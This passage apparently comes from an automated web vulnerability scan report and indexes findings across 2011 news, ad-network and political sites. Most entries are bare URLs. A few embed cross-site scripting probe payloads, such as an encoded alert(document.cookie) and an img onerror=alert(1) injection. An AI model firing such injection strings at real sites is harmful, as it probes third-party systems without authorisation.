18.31. http://ad.doubleclick.net/adj/N5776.126265.CASALEMEDIA/B5120103.7

18.32. http://ad.doubleclick.net/adj/huffpost.politics/longpost

18.33. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain

18.34. http://ad.doubleclick.net/adj/ns.knowyourmobile/general

18.35. http://ad.doubleclick.net/adj/ns.knowyourmobile/general

18.36. http://ad.doubleclick.net/adj/ns.slashgear/general

18.37. http://ad.doubleclick.net/adj/ns.slashgear/general

18.38. http://ad.doubleclick.net/adj/ph.admin/adsense

18.39. http://ad.doubleclick.net/adj/ph.admin/adsense

18.40. http://ad.doubleclick.net/adj/ph.mobile/mobile

18.41. http://ad.doubleclick.net/adj/ph.mobile/mobile

18.42. http://ad.doubleclick.net/adj/ph.news/nation_world

18.43. http://ad.doubleclick.net/adj/ph.news/nation_world

18.44. http://ad.doubleclick.net/adj/ph.news/nation_world

18.45. http://ad.doubleclick.net/adj/ph.news/nation_world

18.46. http://ad.doubleclick.net/adj/ph.news/nation_world

18.47. http://ad.doubleclick.net/adj/ph.news/nation_world

18.48. http://ad.doubleclick.net/adj/q1.philly/news

18.49. http://ad.doubleclick.net/adj/wpni.opinions/blog/right_turn

18.50. http://ad.doubleclick.net/adj/zdgeek.dart/geek-cetera

18.51. http://ad.media6degrees.com/adserv/cs

18.52. http://ad.media6degrees.com/adserv/cs

18.53. http://ad.media6degrees.com/adserv/cs

18.54. http://ad.media6degrees.com/adserv/csst

18.55. http://ad.turn.com/server/ads.js

18.56. http://ad.turn.com/server/ads.js

18.57. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.58. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.59. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.60. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.61. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.62. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

18.63. http://adadvisor.net/adscores/g.js

18.64. http://admeld-match.dotomi.com/admeld/match

18.65. http://admeld.lucidmedia.com/clicksense/admeld/match

18.66. http://ads.pointroll.com/PortalServe/

18.67. http://ads.pointroll.com/PortalServe/

18.68. http://ads.pointroll.com/PortalServe/

18.69. http://ads.specificmedia.com/serve/v=5

18.70. http://ads.tw.adsonar.com/adserving/getAds.jsp

18.71. http://as.casalemedia.com/j

18.72. http://as.casalemedia.com/j

18.73. http://bcp.crwdcntrl.net/px

18.74. http://bcp.crwdcntrl.net/px

18.75. http://bcp.crwdcntrl.net/px

18.76. http://bcp.crwdcntrl.net/px

18.77. http://bcp.crwdcntrl.net/px

18.78. http://bcp.crwdcntrl.net/px

18.79. http://bcp.crwdcntrl.net/px

18.80. http://bh.contextweb.com/bh/drts

18.81. http://bidder.mathtag.com/iframe/notify

18.82. http://bn.xp1.ru4.com/nf

18.83. http://bn.xp1.ru4.com/nf

18.84. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

18.85. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

18.86. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

18.87. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

18.88. http://choices.truste.com/ca

18.89. http://cim.meebo.com/cim

18.90. http://cm.g.doubleclick.net/pixel

18.91. http://cm.g.doubleclick.net/pixel

18.92. http://cm.g.doubleclick.net/pixel

18.93. http://cm.g.doubleclick.net/pixel

18.94. http://cm.g.doubleclick.net/pixel

18.95. http://cm.g.doubleclick.net/pixel

18.96. http://cm.g.doubleclick.net/pixel

18.97. http://cm.g.doubleclick.net/pixel

18.98. http://cms.ad.yieldmanager.net/v1/cms

18.99. http://cms.ad.yieldmanager.net/v1/cms

18.100. http://d.tradex.openx.com/afr.php

18.101. http://dg.specificclick.net/

18.102. http://googleads.g.doubleclick.net/pagead/ads

18.103. http://googleads.g.doubleclick.net/pagead/ads

18.104. http://googleads.g.doubleclick.net/pagead/ads

18.105. http://googleads.g.doubleclick.net/pagead/ads

18.106. http://googleads.g.doubleclick.net/pagead/ads

18.107. http://googleads.g.doubleclick.net/pagead/ads

18.108. http://googleads.g.doubleclick.net/pagead/ads

18.109. http://googleads.g.doubleclick.net/pagead/ads

18.110. http://googleads.g.doubleclick.net/pagead/ads

18.111. http://googleads.g.doubleclick.net/pagead/ads

18.112. http://googleads.g.doubleclick.net/pagead/ads

18.113. http://googleads.g.doubleclick.net/pagead/ads

18.114. http://googleads.g.doubleclick.net/pagead/ads

18.115. http://googleads.g.doubleclick.net/pagead/ads

18.116. http://googleads.g.doubleclick.net/pagead/ads

18.117. http://googleads.g.doubleclick.net/pagead/ads

18.118. http://ib.adnxs.com/ab

18.119. http://ib.adnxs.com/ab

18.120. http://ib.adnxs.com/ab

18.121. http://ib.adnxs.com/ab

18.122. http://ib.adnxs.com/ab

18.123. http://ib.adnxs.com/ab

18.124. http://ib.adnxs.com/ab

18.125. http://ib.adnxs.com/ab

18.126. http://ib.adnxs.com/ab

18.127. http://ib.adnxs.com/if

18.128. http://ib.adnxs.com/if

18.129. http://ib.adnxs.com/seg

18.130. http://ib.adnxs.com/seg

18.131. http://ib.adnxs.com/seg

18.132. http://imp.fetchback.com/serve/fb/imp

18.133. http://imp.fetchback.com/serve/fb/imp

18.134. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

18.135. http://media3.washingtonpost.com/wpost/js/combo

18.136. http://media3.washingtonpost.com/wpost/js/combo

18.137. http://mediacdn.disqus.com/1304984847/build/system/disqus.js

18.138. http://p.brilig.com/contact/bct

18.139. http://p.brilig.com/contact/bct

18.140. http://p.brilig.com/contact/bct

18.141. http://p.brilig.com/contact/bct

18.142. http://p.brilig.com/contact/bct

18.143. http://p.brilig.com/contact/bct

18.144. http://p.brilig.com/contact/bct

18.145. http://p.brilig.com/contact/bct

18.146. http://p.brilig.com/contact/bct

18.147. http://politics.gather.com/viewArticle.action

18.148. http://s.huffpost.com/assets/js.php

18.149. http://s.huffpost.com/assets/js.php

18.150. http://s.huffpost.com/assets/js.php

18.151. http://s.huffpost.com/assets/js.php

18.152. https://secure.smartphoneexperts.com/

18.153. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

18.154. http://slashgeardotcom.disqus.com/recent_comments_widget.js

18.155. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

18.156. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

18.157. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold

18.158. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo

18.159. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo

18.160. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

18.161. http://tag.admeld.com/id

18.162. http://tag.contextweb.com/TagPublish/getad.aspx

18.163. http://tags.bluekai.com/site/2554

18.164. http://tags.bluekai.com/site/2554

18.165. http://tags.bluekai.com/site/2554

18.166. http://tags.bluekai.com/site/2554

18.167. http://tracker.bidder7.mookie1.com/tr-apx

18.168. http://widgets.vodpod.com/javascripts/recent_videos.js

18.169. http://www.facebook.com/plugins/activity.php

18.170. http://www.facebook.com/plugins/facepile.php

18.171. http://www.facebook.com/plugins/like.php

18.172. http://www.facebook.com/plugins/like.php

18.173. http://www.facebook.com/plugins/likebox.php

18.174. http://www.facebook.com/plugins/likebox.php

18.175. http://www.facebook.com/plugins/likebox.php

18.176. http://www.facebook.com/plugins/likebox.php

18.177. http://www.facebook.com/plugins/likebox.php

18.178. http://www.facebook.com/plugins/likebox.php

18.179. http://www.facebook.com/plugins/likebox.php

18.180. http://www.facebook.com/plugins/recommendations.php

18.181. http://www.facebook.com/plugins/recommendations.php

18.182. http://www.facebook.com/plugins/send.php

18.183. http://www.gather.com/login.action

18.184. http://www.google.com/search

18.185. http://www.google.com/trends/hottrends

18.186. http://www.google.com/trends/hottrends

18.187. http://www.huffingtonpost.com/permalink-tracker.html

18.188. http://www.huffingtonpost.com/threeup.php

18.189. http://www.philly.com/s

18.190. http://www.philly.com/s

18.191. http://www.tlsubmit.com/checkout/signup.php

19. Cross-domain script include

19.1. http://ad.amgdgt.com/ads/

19.2. http://ad.amgdgt.com/ads/

19.3. http://ad.amgdgt.com/ads/

19.4. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5

19.5. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2

19.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

19.7. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6

19.8. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10

19.9. http://ad.doubleclick.net/adi/huffpost.politics/news

19.10. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech

19.11. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest

19.12. http://ad.media6degrees.com/adserv/cs

19.13. http://ad.media6degrees.com/adserv/csst

19.14. http://ad.turn.com/server/ads.js

19.15. http://ad.turn.com/server/ads.js

19.16. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

19.17. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

19.18. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

19.19. http://ads.specificmedia.com/serve/v=5

19.20. http://bcp.crwdcntrl.net/px

19.21. http://bcp.crwdcntrl.net/px

19.22. http://bcp.crwdcntrl.net/px

19.23. http://bcp.crwdcntrl.net/px

19.24. http://bcp.crwdcntrl.net/px

19.25. http://bcp.crwdcntrl.net/px

19.26. http://bcp.crwdcntrl.net/px

19.27. http://bn.xp1.ru4.com/nf

19.28. http://bn.xp1.ru4.com/nf

19.29. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

19.30. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

19.31. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

19.32. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

19.33. http://cdn.optmd.com/V2/80181/197812/index.html

19.34. http://cdn.optmd.com/V2/84667/210582/index.html

19.35. http://cdn.slashgear.com/fbrecom.html

19.36. http://cim.meebo.com/cim

19.37. http://d.tradex.openx.com/afr.php

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://ib.adnxs.com/if

19.43. http://ib.adnxs.com/if

19.44. http://imp.fetchback.com/serve/fb/imp

19.45. http://imp.fetchback.com/serve/fb/imp

19.46. http://judo.salon.com/RealMedia/ads/adstream_mjx.ads/www.salonmagazine.com/letters/default.html/1995569501@Top,Frame2,x10,x15,x50,Right,Right1,Right2,Right3,Bottom,Bottom1,Bottom2,Position1,Position2

19.47. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

19.48. http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html

19.49. http://media.washingtonpost.com/wp-srv/ad/tiffany_manager.js

19.50. http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/

19.51. http://politics.gather.com/viewArticle.action

19.52. http://probitaspartners.com/alternative_investments_publications/

19.53. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=1219384/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dreg%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

19.54. http://r1-ads.ace.advertising.com/site=801877/size=728090/u=2/bnum=18662554/hr=9/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.philly.com%252Fs%253Faction%253Dlogin%2526requested%253Dy%2526rurl%253Dhttp%25253A%25252F%25252Fwww.philly.com%25252Fphilly%25252Fnews%25252Fnation_world%25252F121548659.html%25253Fef135%252527%25253Balert%252528document.cookie%252529%25252F%25252F4b169261d24%25253D1

19.55. http://ricksantorum.com/explore/

19.56. http://store.androidcentral.com/belkin-headphone-splitter-y-adapter/11A75A6767.htm

19.57. http://store.androidcentral.com/cart.htm

19.58. http://store.androidcentral.com/jabra-bt2080-bluetooth-headset/9A32A5717.htm

19.59. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

19.60. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None

19.61. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold

19.62. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo

19.63. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo

19.64. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683

19.65. http://talkingpointsmemo.com/archives/2010/02/remember_rick_santorum.php

19.66. http://www.amconmag.com/blog/2011/05/09/the-rick-santorum-scam/

19.67. http://www.amconmag.com/blog/wp-content/themes/quadruple-blue-10/images/bg-dotted.gif

19.68. http://www.amconmag.com/index.html

19.69. http://www.androidcentral.com/android-central-google-io-2011

19.70. http://www.facebook.com/plugins/activity.php

19.71. http://www.facebook.com/plugins/facepile.php

19.72. http://www.facebook.com/plugins/like.php

19.73. http://www.facebook.com/plugins/likebox.php

19.74. http://www.facebook.com/plugins/recommendations.php

19.75. http://www.facebook.com/plugins/send.php

19.76. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce

19.77. http://www.gather.com/URI+SYNTAX+EXCEPTION

19.78. http://www.gather.com/a

19.79. http://www.gather.com/login.action

19.80. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

19.81. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html

19.82. http://www.huffingtonpost.com/permalink-tracker.html

19.83. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html

19.84. http://www.philly.com/philly/news/nation_world/121548659.html

19.85. http://www.philly.com/s

19.86. http://www.ricksantorum.com/

19.87. http://www.slashgear.com/ads/rpufallover.html

19.88. http://www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/

19.89. http://www.tlsubmit.com/

19.90. http://www.tlsubmit.com/checkout/templates/css/images/body-bg.jpg

19.91. http://www.tlsubmit.com/news/

19.92. http://www.tlsubmit.com/tour/

19.93. http://www.tlsubmit.com/tour/incredible-support/

19.94. http://www.tlsubmit.com/tour/outstanding-serps/

19.95. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

19.96. http://www.youtube.com/embed/Iev7TKsXoHo

20. File upload functionality

21. TRACE method is enabled

21.1. http://ad.bnmla.com/

21.2. http://admeld-match.dotomi.com/

21.3. http://ads.pubmatic.com/

21.4. http://ads.specificmedia.com/

21.5. http://adv.netshelter.net/

21.6. http://api.joliprint.com/

21.7. http://bcp.crwdcntrl.net/

21.8. http://beacon.videoegg.com/

21.9. http://bh.contextweb.com/

21.10. http://bn.xp1.ru4.com/

21.11. http://cache.specificmedia.com/

21.12. http://cheetah.vizu.com/

21.13. http://d.tradex.openx.com/

21.14. http://d.xp1.ru4.com/

21.15. http://dg.specificclick.net/

21.16. http://digg.com/

21.17. http://entry-stats.huffpost.com/

21.18. http://id.expressnightout.com/

21.19. http://id.slate.com/

21.20. http://id.theroot.com/

21.21. http://id.trove.com/

21.22. http://id.washingtonpost.com/

21.23. http://image2.pubmatic.com/

21.24. http://image3.pubmatic.com/

21.25. http://imp.fetchback.com/

21.26. http://judo.salon.com/

21.27. http://letters.salon.com/

21.28. http://metrics.philly.com/

21.29. http://mm.chitika.net/

21.30. http://moconews.net/

21.31. http://o.sa.aol.com/

21.32. http://optimized-by.rubiconproject.com/

21.33. http://paidcontent.org/

21.34. http://ping.crowdscience.com/

21.35. http://pixel.rubiconproject.com/

21.36. http://politics.gather.com/

21.37. http://probitaspartners.com/

21.38. http://ptrack.pubmatic.com/

21.39. http://puma.vizu.com/

21.40. http://q1.checkm8.com/

21.41. http://r.openx.net/

21.42. http://samsungsmarttvs.netshelter.net/

21.43. http://secure-us.imrworldwide.com/

21.44. http://t.mookie1.com/

21.45. http://tacoda.at.atwola.com/

21.46. http://tags.bluekai.com/

21.47. http://talkingpointsmemo.com/

21.48. http://tap.rubiconproject.com/

21.49. http://tracker.bidder7.mookie1.com/

21.50. http://www.amconmag.com/

21.51. http://www.gather.com/

21.52. http://www.spreadingsantorum.com/

21.53. http://www.ultraedit.com/

22. Email addresses disclosed

22.1. http://ads.adbrite.com/adserver/behavioral-data/8203

22.2. http://ads.adbrite.com/adserver/behavioral-data/8203

22.3. http://ads.adbrite.com/adserver/behavioral-data/8203

22.4. http://ads.adbrite.com/adserver/behavioral-data/8203

22.5. http://ads.adbrite.com/adserver/behavioral-data/8203

22.6. http://ads.adbrite.com/adserver/vdi/742697

22.7. http://ads.adbrite.com/adserver/vdi/762701

22.8. http://ads.adbrite.com/adserver/vdi/762701

22.9. http://ads.adbrite.com/adserver/vdi/762701

22.10. http://ads.adbrite.com/adserver/vdi/762701

22.11. http://ads.adbrite.com/adserver/vdi/762701

22.12. http://ads.adbrite.com/adserver/vdi/762701

22.13. http://ads.adbrite.com/adserver/vdi/762701

22.14. http://ads2.adbrite.com/v0/ad

22.15. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js

22.16. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js

22.17. http://bstats.adbrite.com/click/bstats.gif

22.18. http://bstats.adbrite.com/click/bstats.gif

22.19. http://cdn.slashgear.com/static/js/appcontainer.js

22.20. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

22.21. http://media3.washingtonpost.com/wpost/javascript/bootstrap/bootstrap.facebook.sdk.js

22.22. http://media3.washingtonpost.com/wpost/js/combo

22.23. http://media3.washingtonpost.com/wpost/js/combo

22.24. http://mediacdn.disqus.com/1304984847/build/system/disqus.js

22.25. http://philly.badgeville.com/api/cGhpbGx5QGJhZGdldmlsbGUuY29t/widgets/comments

22.26. http://probitaspartners.com/about_us/

22.27. http://s.huffpost.com/assets/js.php

22.28. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

22.29. https://secure.smartphoneexperts.com/javascripts/spe-v3.js

22.30. http://store.androidcentral.com/content/customercare/index.htm

22.31. http://store.androidcentral.com/javascripts/spe-v3.js

22.32. https://support.ccbill.com/

22.33. http://talkingpointsmemo.com/jqm.css

22.34. http://talkingpointsmemo.com/jqm.js

22.35. http://talkingpointsmemo.com/prettydigg/diggbutton.js

22.36. http://w.sharethis.com/button/buttons.js

22.37. http://www.amconmag.com/index.html

22.38. http://www.androidcentral.com/android-central-google-io-2011

22.39. http://www.gather.com/js/niftycube.js

22.40. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html

22.41. http://www.knowyourmobile.com/js/controls.js

22.42. http://www.knowyourmobile.com/js/dragdrop.js

22.43. http://www.knowyourmobile.com/js/flowplayer/flashembed.min.js

22.44. http://www.philly.com/includes/s_code.js

22.45. http://www.philly.com/philly/mobile/

22.46. http://www.philly.com/philly/news/nation_world/121548659.html

22.47. http://www.smartphoneexperts.com/

22.48. http://www.spreadingsantorum.com/archives/2004/01/index.html

22.49. http://www.spreadingsantorum.com/archives/2004/03/index.html

22.50. http://www.spreadingsantorum.com/archives/cat_contacting_santorum.html

22.51. http://www.spreadingsantorum.com/archives/cat_santorum_letters.html

22.52. http://www.spreadingsantorum.com/archives/cat_santorum_on_the_web.html

22.53. http://www.spreadingsantorum.com/index2.html

22.54. http://www.washingtonpost.com/blogs/right-turn/post/rick-santorum-doesnt-understand-america/2011/03/29/AFHhSbBG_blog.html

22.55. http://www.washingtonpost.com/r/sites/twpweb/css/2.0.0/modules.css

22.56. http://www.washingtonpost.com/rw/sites/twpweb/js/echo2/v2/core/auth.js

23. Private IP addresses disclosed

23.1. http://connect.facebook.net/en_US/all.js

23.2. http://digg.com/tools/services

23.3. http://q1.checkm8.com/adam/detect

23.4. http://q1.checkm8.com/adam/detect

23.5. http://q1.checkm8.com/adam/detected

23.6. http://q1.checkm8.com/adam/detected

23.7. http://q1.checkm8.com/dispatcher_scripts/browserDataDetect.js

23.8. http://q1digital.checkm8.com/adam/cm8adam_1_call.js

23.9. http://ricksantorum.com/explore/img/learnmore.png

23.10. http://ricksantorum.com/explore/img/santorum_bg3.jpg

23.11. http://ricksantorum.com/explore/img/santorum_connect.png

23.12. http://ricksantorum.com/explore/img/santorum_disclosure.png

23.13. http://ricksantorum.com/explore/img/santorum_donate.png

23.14. http://ricksantorum.com/explore/img/santorum_facebook.png

23.15. http://ricksantorum.com/explore/img/santorum_flickr.png

23.16. http://ricksantorum.com/explore/img/santorum_footer_bg.jpg

23.17. http://ricksantorum.com/explore/img/santorum_twitter.png

23.18. http://ricksantorum.com/explore/img/santorum_youtube.png

23.19. http://ricksantorum.com/favicon.ico

23.20. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.22. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/S4RgCezpKLl.js

23.23. http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

23.24. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/eeURc8RydBq.css

23.25. http://static.ak.fbcdn.net/rsrc.php/v1/zL/r/FGFbc80dUKj.png

23.26. http://static.ak.fbcdn.net/rsrc.php/v1/zk/r/QSupuIwbSa4.png

23.27. http://www.facebook.com/brandlift.php

23.28. http://www.facebook.com/extern/login_status.php

23.29. http://www.facebook.com/extern/login_status.php

23.30. http://www.facebook.com/extern/login_status.php

23.31. http://www.facebook.com/extern/login_status.php

23.32. http://www.facebook.com/extern/login_status.php

23.33. http://www.facebook.com/extern/login_status.php

23.34. http://www.facebook.com/extern/login_status.php

23.35. http://www.facebook.com/extern/login_status.php

23.36. http://www.facebook.com/extern/login_status.php

23.37. http://www.facebook.com/extern/login_status.php

23.38. http://www.facebook.com/extern/login_status.php

23.39. http://www.facebook.com/extern/login_status.php

23.40. http://www.facebook.com/extern/login_status.php

23.41. http://www.facebook.com/extern/login_status.php

23.42. http://www.facebook.com/extern/login_status.php

23.43. http://www.facebook.com/extern/login_status.php

23.44. http://www.facebook.com/extern/login_status.php

23.45. http://www.facebook.com/extern/login_status.php

23.46. http://www.facebook.com/plugins/activity.php

23.47. http://www.facebook.com/plugins/facepile.php

23.48. http://www.facebook.com/plugins/like.php

23.49. http://www.facebook.com/plugins/like.php

23.50. http://www.facebook.com/plugins/like.php

23.51. http://www.facebook.com/plugins/like.php

23.52. http://www.facebook.com/plugins/like.php

23.53. http://www.facebook.com/plugins/like.php

23.54. http://www.facebook.com/plugins/like.php

23.55. http://www.facebook.com/plugins/like.php

23.56. http://www.facebook.com/plugins/like.php

23.57. http://www.facebook.com/plugins/like.php

23.58. http://www.facebook.com/plugins/like.php

23.59. http://www.facebook.com/plugins/like.php

23.60. http://www.facebook.com/plugins/like.php

23.61. http://www.facebook.com/plugins/like.php

23.62. http://www.facebook.com/plugins/like.php

23.63. http://www.facebook.com/plugins/like.php

23.64. http://www.facebook.com/plugins/like.php

23.65. http://www.facebook.com/plugins/like.php

23.66. http://www.facebook.com/plugins/like.php

23.67. http://www.facebook.com/plugins/like.php

23.68. http://www.facebook.com/plugins/like.php

23.69. http://www.facebook.com/plugins/like.php

23.70. http://www.facebook.com/plugins/like.php

23.71. http://www.facebook.com/plugins/like.php

23.72. http://www.facebook.com/plugins/like.php

23.73. http://www.facebook.com/plugins/like.php

23.74. http://www.facebook.com/plugins/like.php

23.75. http://www.facebook.com/plugins/like.php

23.76. http://www.facebook.com/plugins/like.php

23.77. http://www.facebook.com/plugins/likebox.php

23.78. http://www.facebook.com/plugins/likebox.php

23.79. http://www.facebook.com/plugins/likebox.php

23.80. http://www.facebook.com/plugins/likebox.php

23.81. http://www.facebook.com/plugins/likebox.php

23.82. http://www.facebook.com/plugins/likebox.php

23.83. http://www.facebook.com/plugins/likebox.php

23.84. http://www.facebook.com/plugins/recommendations.php

23.85. http://www.facebook.com/plugins/recommendations.php

23.86. http://www.facebook.com/plugins/send.php

23.87. http://www.google.com/sdch/vD843DpA.dct

23.88. http://www.surveygizmo.com/s3/polljs/539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H/

24. Credit card numbers disclosed

25. Robots.txt file

25.1. http://a.tribalfusion.com/displayAd.js

25.2. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

25.3. http://ad.afy11.net/ad

25.4. http://ad.amgdgt.com/ads/

25.5. http://ad.doubleclick.net/adj/ph.news/nation_world

25.6. http://ad.media6degrees.com/adserv/cs

25.7. http://ad.turn.com/server/ads.js

25.8. http://ad.uk.doubleclick.net/adj/knowyourmobile/features/

25.9. http://admeld-match.dotomi.com/admeld/match

25.10. http://ads.pointroll.com/PortalServe/

25.11. http://ads.specificmedia.com/serve/v=5

25.12. http://adsfac.us/ag.asp

25.13. http://adx.g.doubleclick.net/pagead/adview

25.14. http://altfarm.mediaplex.com/ad/fm/13305-124472-22136-1

25.15. http://amch.questionmarket.com/adscgen/sta.php

25.16. http://api.bizographics.com/v1/profile.redirect

25.17. http://api.joliprint.com/res/joliprint/img/buttons/default/joliprint_btn_blank.gif

25.18. http://api.search.live.net/json.aspx

25.19. http://api.twitter.com/1/statuses/user_timeline.json

25.20. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

25.21. http://as.casalemedia.com/s

25.22. http://b.scorecardresearch.com/beacon.js

25.23. http://b.voicefive.com/b

25.24. http://bcp.crwdcntrl.net/4/c=402%7Crand=271498847%7Cpv=y%7Casync=y%7Crt=ifr

25.25. http://bidder.mathtag.com/notify

25.26. http://bn.xp1.ru4.com/nf

25.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.28. http://c.betrad.com/a/n/273/456.js

25.29. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

25.30. http://cache.specificmedia.com/creative/blank.gif

25.31. http://cas.criteo.com/delivery/ajs.php

25.32. http://cdn.optmd.com/V2/84667/210582/index.html

25.33. http://cdn.shoutlet.com/service/shoutletshare/widget

25.34. http://cdn.slashgear.com/wp-content/themes/sgv4/style.css

25.35. http://cdn.turn.com/server/ddc.htm

25.36. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6

25.37. http://cheetah.vizu.com/c.gif

25.38. http://cim.meebo.com/cim

25.39. http://cm.g.doubleclick.net/pixel

25.40. http://cms.quantserve.com/dpixel

25.41. http://d.tradex.openx.com/afr.php

25.42. http://d.xp1.ru4.com/activity

25.43. http://dar.youknowbest.com/

25.44. http://data.adsrvr.org/map/cookie/contextweb

25.45. http://data.cmcore.com/imp

25.46. http://delivery.uat.247realmedia.com/RealMedia/ads/adstream_sx.ads/zama/728x90

25.47. http://digg.com/tools/services

25.48. http://dis.ny.us.criteo.com/dis/dis.aspx

25.49. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

25.50. http://ev.ib-ibi.com/pibiview.js

25.51. http://feeds.bbci.co.uk/news/rss.xml

25.52. http://g-pixel.invitemedia.com/gmatcher

25.53. http://googleads.g.doubleclick.net/pagead/ads

25.54. http://hs.interpolls.com/inter_2_261.js

25.55. http://idpix.media6degrees.com/orbserv/hbpix

25.56. http://img.mediaplex.com/content/0/13305/124472/Evb_OpportMortgage_Grow_728x90.html

25.57. http://imp.fetchback.com/serve/fb/adtag.js

25.58. http://l.addthiscdn.com/live/t00/250lo.gif

25.59. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

25.60. http://load.exelator.com/load/

25.61. http://loadm.exelator.com/load/

25.62. http://map.media6degrees.com/orbserv/hbjs

25.63. http://media.philly.com/designimages/favicon.ico

25.64. http://media.washingtonpost.com/wp-srv/ad/blog_147x41.js

25.65. http://media3.washingtonpost.com/wpost/css/combo

25.66. http://media7.washingtonpost.com/NetworkNews3-war/NetworkNewsServlet/section/blogs/timeframe/48

25.67. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047

25.68. http://metrics.washingtonpost.com/b/ss/wpniwashpostcom/1/H.10-Pdvu-2/s62069979894440

25.69. http://mm.chitika.net/minimall

25.70. http://mpd.mxptint.net/1/S83.API/G1/T179/js

25.71. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.72. http://o.sa.aol.com/b/ss/aolhuffpo,aolsvc/1/H.21/s66497040821705

25.73. http://pagead2.googlesyndication.com/pagead/imgad

25.74. http://philly.badgeville.com/api/cGhpbGx5QGJhZGdldmlsbGUuY29t/widgets/comments

25.75. http://pixel.invitemedia.com/data_sync

25.76. http://pixel.quantserve.com/pixel

25.77. http://politics.gather.com/viewArticle.action

25.78. http://pubads.g.doubleclick.net/gampad/ads

25.79. http://puma.vizu.com/vendors/pointroll/adcatalyst_tag.js

25.80. http://q1.checkm8.com/adam/detect

25.81. http://r.turn.com/server/pixel.htm

25.82. http://redux.com/related.js

25.83. http://ricksantorum.com/explore/

25.84. http://s.clickability.com/s

25.85. http://s0.2mdn.net/dot.gif

